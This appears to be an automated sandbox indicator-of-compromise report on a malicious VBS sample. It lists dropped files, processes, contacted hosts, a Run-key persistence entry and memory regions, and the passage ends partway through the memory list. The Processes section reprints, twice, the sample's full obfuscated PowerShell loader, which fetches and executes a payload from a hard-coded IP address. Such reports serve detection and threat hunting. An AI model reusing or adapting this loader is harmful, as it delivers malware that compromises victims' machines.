IOC Report
FTG_PD_04024024001.vbs


Files

File Path
Type
Category
Malicious
FTG_PD_04024024001.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaoq5ghe.0os.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onvgj3h0.bwf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qitgwwi2.d5m.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzd4viyq.535.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\s5497I81
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Roaming\Argean.Men
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. 
,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7 7 8 2R2H, 2 6 6,5P1U)V ');Funmaker $Laryngotome;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. 
,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7 7 8 2R2H, 2 6 6,5P1U)V ');Funmaker $Laryngotome;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe
"C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe"
malicious
C:\Windows\SysWOW64\AtBroker.exe
"C:\Windows\SysWOW64\AtBroker.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
3 further processes are hidden in this view and are not listed here.

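URLs

Note: this list appears to mix URLs extracted as strings from files and process memory with URLs that were actually requested. The many CRL/OCSP/policy entries with stray trailing characters look like certificate-store strings (compare the dropped authroot.stl cache file under Files) rather than network indicators, so review entries individually before using them for blocking or hunting. The 87.121.105.163 entries match the host embedded in the obfuscated PowerShell command line under Processes.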

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
unknown
http://www.certplus.com/CRL/class3.crl0
unknown
http://www.e-me.lv/repository0
unknown
http://www.acabogacia.org/doc0
unknown
http://87.121.105.163/EYioOXUtWs45.binM
unknown
http://crl.chambersign.org/chambersroot.crl0
unknown
http://ocsp.suscerte.gob.ve0
unknown
http://www.postsignum.cz/crl/psrootqca2.crl02
unknown
https://aka.ms/pscore6lBeq
unknown
http://crl.dhimyotis.com/certignarootca.crl0
unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
unknown
http://www.chambersign.org1
unknown
http://www.pkioverheid.nl/policies/root-policy0
unknown
http://repository.swisssign.com/0
unknown
http://www.suscerte.gob.ve/lcr0#
unknown
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
unknown
http://crl.ssc.lt/root-c/cacrl.crl0
unknown
http://postsignum.ttc.cz/crl/psrootqca2.crl0
unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0
unknown
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
unknown
http://www.certplus.com/CRL/class3P.crl0
unknown
http://www.suscerte.gob.ve/dpc0
unknown
http://www.certeurope.fr/reference/root2.crl0
unknown
http://www.certplus.com/CRL/class2.crl0
unknown
http://www.disig.sk/ca/crl/ca_disig.crl0
unknown
http://www.defence.gov.au/pki0
unknown
https://nuget.org/nuget.exe
unknown
http://www.sk.ee/cps/0
unknown
http://www.globaltrust.info0=
unknown
http://www.anf.es
unknown
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.postsignum.cz/crl/psrootqca4.crl02
unknown
http://pki.registradores.org/normativa/index.htm0
unknown
http://policy.camerfirma.com0
unknown
http://www.ssc.lt/cps03
unknown
http://ocsp.pki.gva.es0
unknown
http://www.anf.es/es/address-direccion.html
unknown
https://www.anf.es/address/)1(0&
unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
unknown
http://ca.mtin.es/mtin/ocsp0
unknown
http://crl.ssc.lt/root-b/cacrl.crl0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
unknown
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
unknown
http://www.certicamara.com/dpc/0Z
unknown
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
unknown
https://go.micro
unknown
https://wwww.certigna.fr/autorites/0m
unknown
http://www.dnie.es/dpc0
unknown
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
http://ca.mtin.es/mtin/DPCyPoliticas0
unknown
https://www.anf.es/AC/ANFServerCA.crl0
unknown
https://repository.tsp.zetes.com0
unknown
http://www.globaltrust.info0
unknown
http://certificates.starfieldtech.com/repository/1604
unknown
http://acedicom.edicomgroup.com/doc0
unknown
http://www.certplus.com/CRL/class3TS.crl0
unknown
https://github.com/Pester/Pester
unknown
https://crl.anf.es/AC/ANFServerCA.crl0
unknown
http://www.certeurope.fr/reference/pc-root2.pdf0
unknown
http://ac.economia.gob.mx/last.crl0G
unknown
http://87.121.105.163/Stereotyperingens72.xsnXRyl4
unknown
https://www.catcert.net/verarrel
unknown
http://www.disig.sk/ca0f
unknown
http://87.121.105.163/
unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
unknown
http://www.e-szigno.hu/RootCA.crl
unknown
http://www.sk.ee/juur/crl/0
unknown
http://crl.chambersign.org/chambersignroot.crl0
unknown
http://crl.xrampsecurity.com/XGCA.crl0
unknown
http://certs.oati.net/repository/OATICA2.crl0
unknown
http://crl.oces.trust2408.com/oces.crl0
unknown
http://www.quovadis.bm0
unknown
http://crl.ssc.lt/root-a/cacrl.crl0
unknown
http://certs.oaticerts.com/repository/OATICA2.crl
unknown
http://certs.oati.net/repository/OATICA2.crt0
unknown
http://www.accv.es00
unknown
http://www.pkioverheid.nl/policies/root-policy-G20
unknown
https://www.netlock.net/docs
unknown
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
unknown
http://www.e-trust.be/CPS/QNcerts
unknown
http://ocsp.ncdc.gov.sa0
unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0
unknown
http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
unknown
http://crl2.postsignum.cz/crl/psrootqca4.crl01
unknown
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
unknown
http://web.ncdc.gov.sa/crl/nrcaparta1.crl
unknown
http://www.datev.de/zertifikat-policy-int0
unknown
http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
unknown
https://repository.luxtrust.lu0
unknown
http://cps.chambersign.org/cps/chambersroot.html0
unknown
https://contoso.com/License
unknown
http://www.acabogacia.org0
unknown
http://www.firmaprofesional.com/cps0
unknown
http://www.uce.gub.uy/acrn/acrn.crl0
unknown
90 further URLs are hidden in this view and are not listed here.

Domains

Name
IP
Malicious
www.tyaer.com
47.91.88.207
malicious
www.megabet303.lol
unknown
malicious
bg.microsoft.map.fastly.net
199.232.214.172
www.oyoing.com
127.0.0.1

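IPs

Note: 87.121.105.163 carries no malicious flag in this table, yet it is the host referenced by the PowerShell command line under Processes and by several entries under URLs, so it should be reviewed alongside the flagged address. The 127.0.0.1 answer for www.oyoing.com is a loopback address and says nothing about where that domain is really hosted.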

IP
Domain
Country
Malicious
47.91.88.207
www.tyaer.com
United States
malicious
87.121.105.163
unknown
Bulgaria
127.0.0.1
www.oyoing.com
unknown

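Registry

Note: no entry in this table carries a malicious flag. The HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value AJ5HR8DXLPTX is written to an autostart location and is the entry most relevant to persistence. The Tracing\powershell_RAS*, MuiCache and UserAssist entries are of the kind Windows commonly writes as a side effect of network API use and Explorer activity; UserAssist value names are ROT13-encoded by the operating system.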

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AJ5HR8DXLPTX
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
10 further registry entries are hidden in this view and are not listed here.

Memdumps

Base Address
Regiontype
Protect
Malicious
1100000
system
page execute and read and write
malicious
2FD0000
trusted library allocation
page read and write
malicious
25220000
unclassified section
page execute and read and write
malicious
2CD0000
system
page execute and read and write
malicious
1CB10070000
trusted library allocation
page read and write
malicious
A034000
direct allocation
page execute and read and write
malicious
2E70000
system
page execute and read and write
malicious
8CD0000
direct allocation
page execute and read and write
malicious
2F70000
trusted library allocation
page read and write
malicious
55D0000
unkown
page execute and read and write
malicious
6060000
trusted library allocation
page read and write
malicious
3094000
remote allocation
page execute and read and write
1B66CF9E000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
1B66CDE2000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
281BDC7D000
system
page execute and read and write
7CD93A3000
stack
page read and write
1B66CFBE000
heap
page read and write
4931000
heap
page read and write
1CB6F7A0000
trusted library allocation
page read and write
1020000
unkown
page read and write
7B9E000
stack
page read and write
B30000
unkown
page readonly
6B2E000
stack
page read and write
1B66CC05000
heap
page read and write
1B66CF9F000
heap
page read and write
7F19000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
1B66AF88000
heap
page read and write
6AE0000
heap
page read and write
78B000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
11FD000
system
page execute and read and write
1B66CC05000
heap
page read and write
4F5D000
direct allocation
page execute and read and write
315E000
stack
page read and write
2C08000
heap
page read and write
1B66CD91000
heap
page read and write
4931000
heap
page read and write
715E000
stack
page read and write
1CB102EB000
trusted library allocation
page read and write
1CB0082E000
trusted library allocation
page read and write
8A7C000
heap
page read and write
32BA000
heap
page read and write
1020000
unkown
page read and write
7FF849000000
trusted library allocation
page read and write
1B66AF52000
heap
page read and write
1298000
heap
page read and write
1CB6F720000
heap
page read and write
1B66CDE4000
heap
page read and write
12F13130000
heap
page read and write
4931000
heap
page read and write
34E0000
heap
page read and write
725E000
stack
page read and write
3470000
trusted library allocation
page read and write
1CB7160A000
heap
page read and write
1B66CDBB000
heap
page read and write
1B66CD89000
heap
page read and write
8D40000
trusted library allocation
page execute and read and write
4C0A000
heap
page read and write
7F87000
heap
page read and write
49DE000
stack
page read and write
1CB0053E000
trusted library allocation
page read and write
3113000
heap
page read and write
1C7000
unkown
page readonly
1B66CD3B000
heap
page read and write
803D000
stack
page read and write
4931000
heap
page read and write
8A1C000
stack
page read and write
10F0000
heap
page read and write
9480000
direct allocation
page execute and read and write
2B30000
unkown
page readonly
1B66CC98000
heap
page read and write
6A39000
heap
page read and write
6B64000
heap
page read and write
4931000
heap
page read and write
7A50000
trusted library allocation
page read and write
1CB6F5B0000
heap
page read and write
3460000
trusted library allocation
page read and write
1CB71644000
heap
page read and write
1B66CFAE000
heap
page read and write
1B66AF6F000
heap
page read and write
1CB00223000
trusted library allocation
page read and write
1290000
heap
page read and write
BD0000
unkown
page readonly
1B66CD58000
heap
page read and write
6A4F000
heap
page read and write
24820000
unclassified section
page execute and read and write
1B66CF9B000
heap
page read and write
1CB0098F000
trusted library allocation
page read and write
8AAA000
heap
page read and write
1CB710AF000
heap
page read and write
1B66CEEB000
heap
page read and write
6B64000
heap
page read and write
1CB6F6F3000
heap
page read and write
281BFABE000
trusted library allocation
page read and write
1CB6F767000
heap
page read and write
1B66CC00000
heap
page read and write
1CB715B3000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4DEF000
stack
page read and write
1B66AF64000
heap
page read and write
7EE2000
heap
page read and write
79DF000
heap
page read and write
1B66AF82000
heap
page read and write
7C90000
trusted library allocation
page read and write
6A42000
heap
page read and write
1B66CDBB000
heap
page read and write
86E0000
trusted library allocation
page read and write
640000
heap
page read and write
4931000
heap
page read and write
7FF848EC0000
trusted library allocation
page execute and read and write
7978000
heap
page read and write
1CB6F680000
trusted library allocation
page read and write
1B66CF1C000
heap
page read and write
2FC0000
heap
page read and write
2F49000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
2FB0000
heap
page read and write
4931000
heap
page read and write
310E000
heap
page read and write
1B66CD8B000
heap
page read and write
4931000
heap
page read and write
4F40000
heap
page read and write
2818A2A0000
heap
page read and write
4DA0000
heap
page read and write
858E000
stack
page read and write
1B66CDD5000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
2229E000
stack
page read and write
8A33000
heap
page read and write
1B66AE40000
heap
page read and write
541C000
stack
page read and write
21C50000
direct allocation
page read and write
4931000
heap
page read and write
22373000
heap
page read and write
281BF640000
trusted library allocation
page read and write
12F13138000
heap
page read and write
1B66CDBB000
heap
page read and write
1B66CD62000
heap
page read and write
7410000
direct allocation
page read and write
281BDD10000
heap
page read and write
3368000
heap
page read and write
281BF90A000
trusted library allocation
page read and write
1B66CD00000
heap
page read and write
6A10000
heap
page read and write
12D0000
heap
page read and write
1B66CDC7000
heap
page read and write
1CB00001000
trusted library allocation
page read and write
4931000
heap
page read and write
12F134B5000
heap
page read and write
2D7E000
stack
page read and write
1CB7156C000
heap
page read and write
12F13060000
heap
page read and write
4940000
heap
page read and write
1B66CC01000
heap
page read and write
4931000
heap
page read and write
1B66CDFD000
heap
page read and write
7F56000
heap
page read and write
6A42000
heap
page read and write
3042000
heap
page read and write
3531000
heap
page read and write
4931000
heap
page read and write
1B66CC12000
heap
page read and write
2E30000
direct allocation
page read and write
3039000
heap
page read and write
30C6000
heap
page read and write
7F82000
heap
page read and write
4DB9000
direct allocation
page execute and read and write
346A000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
1B66CC6B000
heap
page read and write
4931000
heap
page read and write
3440000
trusted library allocation
page read and write
4D9D000
stack
page read and write
1B66CF35000
heap
page read and write
2D3E000
stack
page read and write
1B66CC08000
heap
page read and write
4931000
heap
page read and write
854F000
stack
page read and write
4931000
heap
page read and write
1B66CDC7000
heap
page read and write
6A3B000
heap
page read and write
7F24000
heap
page read and write
1CB7187A000
heap
page read and write
7C80000
trusted library allocation
page read and write
1CB6F6D2000
heap
page read and write
1B66CF3B000
heap
page read and write
1CB71841000
heap
page read and write
1B66CC3A000
heap
page read and write
1B66CD8B000
heap
page read and write
2EE4000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
3410000
trusted library section
page read and write
3538000
heap
page read and write
1CB0060D000
trusted library allocation
page read and write
1CB718D5000
heap
page read and write
1647E7C000
stack
page read and write
1B66CC25000
heap
page read and write
7F08000
heap
page read and write
4931000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
1B66CF35000
heap
page read and write
1040000
unkown
page read and write
2299D000
direct allocation
page execute and read and write
499D000
stack
page read and write
7F01000
heap
page read and write
4DA7000
heap
page read and write
7FF848EB6000
trusted library allocation
page read and write
7F5B000
heap
page read and write
7FF848FBA000
trusted library allocation
page read and write
3527000
heap
page read and write
4931000
heap
page read and write
6D30000
direct allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
1290000
heap
page read and write
1B66AF08000
heap
page read and write
4931000
heap
page read and write
7FE9000
heap
page read and write
87BE000
stack
page read and write
7CC0000
trusted library allocation
page read and write
8D20000
direct allocation
page read and write
4931000
heap
page read and write
1CB71824000
heap
page read and write
1B66CEB3000
heap
page read and write
6A5B000
heap
page read and write
6A3B000
heap
page read and write
7CE0000
trusted library allocation
page read and write
4931000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
1C5000
unkown
page read and write
1CB6F6D7000
heap
page read and write
4931000
heap
page read and write
2C20000
heap
page read and write
4C0E000
heap
page read and write
74EE000
stack
page read and write
7EF70000
trusted library allocation
page execute and read and write
1CB01AAC000
trusted library allocation
page read and write
55B0000
trusted library allocation
page read and write
7CD9CFE000
stack
page read and write
4931000
heap
page read and write
4F4E000
stack
page read and write
8815000
trusted library allocation
page read and write
4F10000
heap
page read and write
2818A535000
heap
page read and write
4E2E000
direct allocation
page execute and read and write
1B66D100000
heap
page read and write
2EE0000
remote allocation
page execute and read and write
2EE4000
heap
page read and write
B1511FE000
stack
page read and write
7CA0000
trusted library allocation
